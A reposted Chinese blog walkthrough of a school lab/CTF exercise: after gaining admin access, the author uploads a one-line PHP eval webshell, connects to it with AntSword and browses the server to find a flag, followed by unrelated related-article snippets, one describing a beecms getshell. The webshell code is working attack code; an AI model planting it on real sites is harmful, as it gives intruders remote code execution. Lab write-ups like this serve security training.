植入木马获取网站权限

news/2024/5/9 7:13:10/文章来源:https://blog.csdn.net/Marsper/article/details/108589844

获取网站权限

首先获得需操作网址(下面演示的是学校练习靶机)

在这里插入图片描述
打开网址,利用上篇所讲知识得到后台管理员权限,登入后台管理
在这里插入图片描述
随机寻找可注入点,找到注入点根目录位置
在这里插入图片描述
如图,这个就是随机找到的可植入木马位置

先写好一个木马文件,即一句话木马

<?php @eval($_POST['shell']);?>

将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo();,或者用蚁剑或菜刀等工具连接(我这里用的是蚁剑):

在这里插入图片描述
然后上传至可植入位置,如下图

提交成功则显示下图,并从首页找到文件发布位置,复制文件绝对路径并访问
在这里插入图片描述
在这里插入图片描述打开显示空白即植入成功

打开蚁剑,添加数据并测试链接
在这里插入图片描述
连接成功后即添加并打开
在这里插入图片描述
观察图得知文件名有以“/”开头,所以此为linux系统文件,打开“/”文件寻找flog
在这里插入图片描述
打开这个文件
在这里插入图片描述
分析代码可知flag在/home/$user路径底下,返回路径寻找对应路径
在这里插入图片描述
打开此flag文件

在这里插入图片描述
成功找到flag。
获取权限成功!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_878497.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

centos上 安装配置svnserve服务器与同步到web网站目录

centos上 安装配置svnserve 服务器与同步到web网站目录 一、系统 centos7 x64位 二、svnserve版本 1.7.14 三、检测是否已经安装svn # svnserve --version 如出现版本信息则表示安装过 四、如果没有安装则使用命令安装 yum install subversion -y 五、检查是否安装成功 #svnser…

访问aspx网站请求在此上下文中不可用

访问aspx网站请求在此上下文中不可用 第一步&#xff1a;先检查服务iis设置是否正常&#xff0c;.net是否安装 第二步&#xff1a;检查网站的日志文件&#xff0c;看是否有被修改文件名。 第三步&#xff1a;如果是被修改文件&#xff0c;看日志文件原来是哪一个 issueedit.asp…

iis 设置网站前台后台 http和https分离访问

Iis 设置网站前台后台 http和https分离访问 今天遇到一个项目要求前台与后台访问协议要分离&#xff0c;即前台使用http访问&#xff0c;后台使用https访问。 一、安装重写url2.0模块 1、 从微软的官方网站下载HTTP重写模块2.0(这里以64位为例&#xff09;&#xff0c;下载地…

云虚拟主机配置多个域名网站

//配置文件&#xff1a;web.config 创建文件夹放置项目&#xff1b;&#xff08;可添加多个&#xff09; //host1 //host2 //host3 注&#xff1a;放置项目时&#xff0c;打开网站运行时&#xff0c;如果出现样式加载不出来&#xff0c;图片加载不出来时&#xff0c;表明路…

js 鼠标事件总结 mouseover/mouseout 与mouseenter/mouseleave 傻傻分不清楚?

1. 鼠标事件 mouseenter mouseleave (一对事件 鼠标的进入和离开) 不支持冒泡 mouseenter&#xff1a;鼠标从元素外部移到元素内部时触发。 mouseleave&#xff1a;鼠标从元素内部移到元素外部时触发。 这两个事件 a) 不冒泡&#xff0c;b) 鼠标经过子元素时不触发父元素的该…

502网站速度慢的原因

困扰了几天的问题&#xff0c;php脚本执行时间也不慢&#xff0c;fastcgi进程也还有很多&#xff0c;但是网站打开特别慢。原因就是网络带宽给跑满了。

电影网站站架构(第一版)

有时间写一下公司用6台服务器搭建的一个电影站点小集群架构。 总共6台服务器&#xff0c;大体搭建如下 后期需要做的几个优化 1.准备用LVSKeepalived解决单点故障 2.使用varnish缓存一部分请求 3.redis数据写入到队列里面&#xff0c;进行异步插库操作 4.使用nagios,zabbi…

webbench网站压力测试结果

使用webbench做压力测试结果&#xff1a; 经过压力测试&#xff0c;60秒钟最多只能接受600并发。后面nginx就会出现502报错了。是由于5m带宽给跑满了。后期还得增加带宽。

关于网站负载均衡的思考

一、基本介绍 从之前接触网站负载均衡到现在&#xff0c;我发现在很多东西其实都是相通的&#xff0c;就比如说目前在研究OSI七层模型的时候&#xff0c;再次去读网关的概念的时候&#xff0c;意外收获了网关服务器的概念&#xff0c;对于这个一般是用在游戏开发的架构设计中会…

加速网站静态资源访问的方法

一、采用CDN 借助一张图来说明下&#xff0c;其实CDN的概念大致可以理解为在每个地区建立一个网络中心&#xff0c;这样做的好处就是用户访问速度加快了&#xff0c;不然的话就比如说你只有一台服务器在北京&#xff0c;而我要在全国各地去访问&#xff0c;这样的话信道传输速…

python爬取网站图片和os模块简介

嗯&#xff0c;最近帮了一个网友做了下图片下载分类&#xff0c;这里记录下来分享一下&#xff1a; 首先了解下os模块的语法 判断文件是否存在 import os os.path.exists(test_file.txt) #Trueos.path.exists(no_exist_file.txt) #False判断文件夹是否存在 import os os.path…

一元建站-基于函数计算 + wordpress 构建 serverless 网站

前言 本文旨在通过 快速部署一个 wordpress 网站到阿里云函数计算平台 这个示例来展示 serverless web 新的开发模式, 包括 FUN 工具一键初始化 NAS, 同步网站到 NAS, 一键部署等能力&#xff0c; 展现函数计算的开发敏捷特性、自动弹性伸缩能力、免运维和完善的监控设施。 相…

link rel=alternate网站换肤功能最佳实现

by zhangxinxu from https://www.zhangxinxu.com/wordpress/?p8512 本文可全文转载&#xff0c;个人网站无需授权&#xff0c;只要保留原作者、出处以及文中链接即可&#xff0c;任何网站均可摘要聚合&#xff0c;商用请联系授权。 一、大多数开发人员的实现 大多数前端开发…

nodejs 网站架构

有兴趣的可以下载

_004_EclipseOperation_Eclipse将一段代码抽取封装

来自https://www.jb51.net/softjc/581893.html&#xff0c;感谢作者的无私分享。 1、使用Eclipse打开已有的项目代码或者新建一个测试项目代码。将需要抽取封装方法的代码块选中&#xff0c;右击选择Refactor&#xff0c;再选择Extract Method&#xff0c;快捷键&#xff08;A…

_006_EclipseOperation_创建eclipse新的workspace并设置workspace共享配置

声明&#xff1a;该博文引自http://www.cnblogs.com/whycxb/p/4848695.html 一&#xff1a;创建新的workspace 1、File——Switch Workspace——Other 2、修改workspace路径和名称 3、修改后如下&#xff1a; 4、点击OK按钮后&#xff0c;eclipse自动重启 同时&#xff0c;相…

记一次小网站渗透过程

一、序言 记录某一次无意点开的一个小网站的渗透过程&#xff0c;幸运的是搭建平台是phpstudy&#xff0c;cms是beecms&#xff0c;beecms有通用漏洞&#xff0c;然后去网上找了资料&#xff0c;成功getshell并获取服务器权限。 二、渗透过程 无意点开一个网站&#xff0c;发…

_031_EclipseOperation_Eclipse修改导航栏的颜色

以上是个人随性配置&#xff0c;某些项的设置不懂&#xff0c;结果如下&#xff1a;

网站跨站点单点登录

昨天和几位朋友探讨到了这个话题&#xff0c;发现虽然单点登录&#xff0c;或者叫做独立的passport登录虽然已经有了很多实现方法&#xff0c;但是能真正了解并实现的人却并不太多&#xff0c;所以些下此文&#xff0c;希望从原理到实现&#xff0c;能让大家了解的多一些 至于什…